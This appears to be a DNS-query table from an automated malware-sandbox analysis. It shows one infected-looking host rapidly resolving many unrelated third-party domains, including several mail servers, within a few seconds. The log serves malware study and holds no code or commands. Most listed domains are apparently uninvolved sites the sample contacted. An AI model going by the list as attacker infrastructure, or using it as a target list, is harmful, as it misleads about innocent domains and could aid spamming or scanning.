                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.684535027 CEST192.168.2.48.8.8.80x9c18Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.731118917 CEST192.168.2.48.8.8.80x7991Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.738614082 CEST192.168.2.48.8.8.80x84e0Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.768471956 CEST192.168.2.48.8.8.80x236fStandard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.771946907 CEST192.168.2.48.8.8.80x762eStandard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.772399902 CEST192.168.2.48.8.8.80x6da5Standard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.774580956 CEST192.168.2.48.8.8.80x5d56Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.785952091 CEST192.168.2.48.8.8.80x67ddStandard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.789820910 CEST192.168.2.48.8.8.80xb2adStandard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.815737009 CEST192.168.2.48.8.8.80x24cfStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.842972994 CEST192.168.2.48.8.8.80xc03Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.848843098 CEST192.168.2.48.8.8.80x4687Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.867630959 CEST192.168.2.48.8.8.80x3d7Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.886095047 CEST192.168.2.48.8.8.80x80d2Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.896853924 CEST192.168.2.48.8.8.80x95f5Standard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.914346933 CEST192.168.2.48.8.8.80x833cStandard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.976221085 CEST192.168.2.48.8.8.80xf5edStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.001465082 CEST192.168.2.48.8.8.80x51b7Standard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.003637075 CEST192.168.2.48.8.8.80x8551Standard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.006588936 CEST192.168.2.48.8.8.80xc057Standard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.022301912 CEST192.168.2.48.8.8.80x3965Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.024005890 CEST192.168.2.48.8.8.80x7c89Standard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.024658918 CEST192.168.2.48.8.8.80x5772Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.026557922 CEST192.168.2.48.8.8.80x61faStandard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.035155058 CEST192.168.2.48.8.8.80xcc0aStandard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.038022995 CEST192.168.2.48.8.8.80x4dbeStandard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.040833950 CEST192.168.2.48.8.8.80x35fbStandard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.040833950 CEST192.168.2.48.8.8.80xd2e1Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.042170048 CEST192.168.2.48.8.8.80x8806Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.046900034 CEST192.168.2.48.8.8.80x4883Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.048342943 CEST192.168.2.48.8.8.80xc042Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.051275969 CEST192.168.2.48.8.8.80xbc1eStandard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.057830095 CEST192.168.2.48.8.8.80xdd81Standard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.089293003 CEST192.168.2.48.8.8.80xcb8bStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.131372929 CEST192.168.2.48.8.8.80x9e8dStandard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.134565115 CEST192.168.2.48.8.8.80xa3f1Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.147305012 CEST192.168.2.48.8.8.80xe978Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.148195982 CEST192.168.2.48.8.8.80xfe90Standard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.166804075 CEST192.168.2.48.8.8.80x64a6Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.177541018 CEST192.168.2.48.8.8.80x98d3Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.205897093 CEST192.168.2.48.8.8.80xf1dbStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.217536926 CEST192.168.2.4192.58.128.300x55Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.241444111 CEST192.168.2.48.8.8.80x14bStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.259826899 CEST192.168.2.4192.5.5.2410x3Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.260901928 CEST192.168.2.48.8.8.80x159Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.277355909 CEST192.168.2.4192.5.5.2410x16Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.278781891 CEST192.168.2.48.8.8.80x539Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.290009022 CEST192.168.2.48.8.8.80x7235Standard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.325356960 CEST192.168.2.48.8.8.80xe27Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.356653929 CEST192.168.2.48.8.8.80x94caStandard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.356653929 CEST192.168.2.48.8.8.80xeb86Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.375418901 CEST192.168.2.48.8.8.80x713eStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.478043079 CEST192.168.2.48.8.8.80xe65fStandard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.564193964 CEST192.168.2.48.8.8.80x43cStandard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.595407009 CEST192.168.2.48.8.8.80xb83eStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.606614113 CEST192.168.2.48.8.8.80xfecdStandard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.608854055 CEST192.168.2.48.8.8.80x1e7fStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.637037992 CEST192.168.2.48.8.8.80x6324Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.640366077 CEST192.168.2.48.8.8.80x1865Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.674554110 CEST192.168.2.48.8.8.80x1678Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.823146105 CEST192.168.2.48.8.8.80x86c1Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.835438967 CEST192.168.2.4192.228.79.2010xa3Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.847095966 CEST192.168.2.48.8.8.80xc200Standard query (0)smtp.sbcglobal.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.862207890 CEST192.168.2.4192.33.4.120xf5Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.868341923 CEST192.168.2.48.8.8.80x3d7Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.879199028 CEST192.168.2.48.8.8.80xc03Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.885467052 CEST192.168.2.4192.203.230.100xc2Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.887916088 CEST192.168.2.48.8.8.80xf803Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:36.931188107 CEST192.168.2.48.8.8.80x5ae0Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.033042908 CEST192.168.2.48.8.8.80x176fStandard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.056319952 CEST192.168.2.48.8.8.80x3707Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.196216106 CEST192.168.2.48.8.8.80x8af2Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.273505926 CEST192.168.2.48.8.8.80xff61Standard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.335504055 CEST192.168.2.4192.33.4.120x74Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.339011908 CEST192.168.2.48.8.8.80x5129Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.359281063 CEST192.168.2.4192.203.230.100x22Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.368647099 CEST192.168.2.48.8.8.80xecc6Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.376378059 CEST192.168.2.4192.36.148.170x73Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.477982998 CEST192.168.2.48.8.8.80x644cStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.481322050 CEST192.168.2.48.8.8.80xf302Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.521847010 CEST192.168.2.48.8.8.80x3c19Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.546727896 CEST192.168.2.48.8.8.80x3337Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.669115067 CEST192.168.2.48.8.8.80xb6c6Standard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.704257011 CEST192.168.2.48.8.8.80x2a56Standard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.781881094 CEST192.168.2.48.8.8.80x90b1Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.785505056 CEST192.168.2.48.8.8.80x4ef2Standard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.789043903 CEST192.168.2.48.8.8.80x4fa4Standard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.811563015 CEST192.168.2.48.8.8.80xf8b3Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.839901924 CEST192.168.2.48.8.8.80xca02Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.853980064 CEST192.168.2.48.8.8.80x6be3Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.876307011 CEST192.168.2.48.8.8.80x4123Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.918471098 CEST192.168.2.48.8.8.80xad2Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.929457903 CEST192.168.2.48.8.8.80x9b29Standard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.951400995 CEST192.168.2.48.8.8.80xf2c0Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:37.981406927 CEST192.168.2.48.8.8.80x77c6Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.099657059 CEST192.168.2.48.8.8.80x4883Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.108661890 CEST192.168.2.48.8.8.80xd542Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.343641043 CEST192.168.2.48.8.8.80x2f71Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.378690004 CEST192.168.2.48.8.8.80xe166Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.427782059 CEST192.168.2.48.8.8.80x867eStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.460395098 CEST192.168.2.48.8.8.80x297cStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.464878082 CEST192.168.2.48.8.8.80xbe20Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.467199087 CEST192.168.2.48.8.8.80xc47fStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.510368109 CEST192.168.2.48.8.8.80xb6d7Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.540153027 CEST192.168.2.48.8.8.80xef77Standard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.647200108 CEST192.168.2.48.8.8.80xbebcStandard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.759726048 CEST192.168.2.48.8.8.80xc4d8Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.763726950 CEST192.168.2.48.8.8.80x882eStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.806083918 CEST192.168.2.48.8.8.80x46f0Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.853497982 CEST192.168.2.48.8.8.80x8dedStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.902663946 CEST192.168.2.48.8.8.80x2b8bStandard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.908622980 CEST192.168.2.48.8.8.80xc03Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.913053036 CEST192.168.2.48.8.8.80xf71dStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:38.998517036 CEST192.168.2.48.8.8.80xa8ddStandard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.021486044 CEST192.168.2.48.8.8.80x21fdStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.040277004 CEST192.168.2.48.8.8.80xfcd6Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.227592945 CEST192.168.2.48.8.8.80x5d63Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.313038111 CEST192.168.2.48.8.8.80x17dStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.346378088 CEST192.168.2.48.8.8.80xbc5bStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.394040108 CEST192.168.2.48.8.8.80xc7d4Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.424973011 CEST192.168.2.48.8.8.80xe8c8Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.459630013 CEST192.168.2.48.8.8.80xe26dStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.489444971 CEST192.168.2.48.8.8.80xc47fStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.529474974 CEST192.168.2.48.8.8.80xc666Standard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.568499088 CEST192.168.2.48.8.8.80x8d12Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.748284101 CEST192.168.2.48.8.8.80x2b87Standard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.760691881 CEST192.168.2.48.8.8.80xb647Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.801162004 CEST192.168.2.48.8.8.80x738fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.802992105 CEST192.168.2.48.8.8.80x34a7Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.817673922 CEST192.168.2.48.8.8.80x6616Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.818995953 CEST192.168.2.48.8.8.80x58b7Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.861545086 CEST192.168.2.48.8.8.80xb941Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:39.986499071 CEST192.168.2.48.8.8.80xcc39Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.001070023 CEST192.168.2.48.8.8.80xfcd6Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.069086075 CEST192.168.2.48.8.8.80xdb62Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.086209059 CEST192.168.2.48.8.8.80xcb9cStandard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.099853992 CEST192.168.2.48.8.8.80xc799Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.168708086 CEST192.168.2.48.8.8.80x6541Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.244595051 CEST192.168.2.48.8.8.80x4fe1Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.355498075 CEST192.168.2.48.8.8.80x971eStandard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.449398994 CEST192.168.2.48.8.8.80xe139Standard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.570713043 CEST192.168.2.48.8.8.80xc47fStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.614888906 CEST192.168.2.48.8.8.80x945fStandard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.617552042 CEST192.168.2.48.8.8.80x2112Standard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.650206089 CEST192.168.2.48.8.8.80xac72Standard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.652568102 CEST192.168.2.48.8.8.80x7c1eStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.686906099 CEST192.168.2.48.8.8.80xdd24Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.718661070 CEST192.168.2.48.8.8.80xe8b5Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.757867098 CEST192.168.2.48.8.8.80x5f4cStandard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.831706047 CEST192.168.2.48.8.8.80x738fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.853173018 CEST192.168.2.48.8.8.80xbb7aStandard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:40.860321045 CEST192.168.2.48.8.8.80xfb8bStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.017056942 CEST192.168.2.48.8.8.80xfcd6Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.182694912 CEST192.168.2.48.8.8.80xa9adStandard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.266706944 CEST192.168.2.48.8.8.80xf56bStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.280273914 CEST192.168.2.48.8.8.80x7cd9Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.287148952 CEST192.168.2.48.8.8.80xa679Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.337913036 CEST192.168.2.48.8.8.80x7685Standard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.381257057 CEST192.168.2.48.8.8.80xb2efStandard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.402158976 CEST192.168.2.48.8.8.80x775dStandard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.437591076 CEST192.168.2.48.8.8.80xb35dStandard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.440545082 CEST192.168.2.48.8.8.80x2af4Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.480130911 CEST192.168.2.48.8.8.80x3cf8Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.551242113 CEST192.168.2.48.8.8.80x7058Standard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.670874119 CEST192.168.2.48.8.8.80x4519Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.725899935 CEST192.168.2.48.8.8.80xfd8fStandard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:41.878997087 CEST192.168.2.48.8.8.80x738fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.142352104 CEST192.168.2.48.8.8.80x54afStandard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.160957098 CEST192.168.2.48.8.8.80xe015Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.175911903 CEST192.168.2.48.8.8.80x3047Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.324421883 CEST192.168.2.48.8.8.80x807cStandard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.421488047 CEST192.168.2.48.8.8.80xe10aStandard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.480329990 CEST192.168.2.48.8.8.80x8d5dStandard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.489703894 CEST192.168.2.48.8.8.80x2af4Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.518544912 CEST192.168.2.48.8.8.80xef7bStandard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:42.713808060 CEST192.168.2.48.8.8.80xe404Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
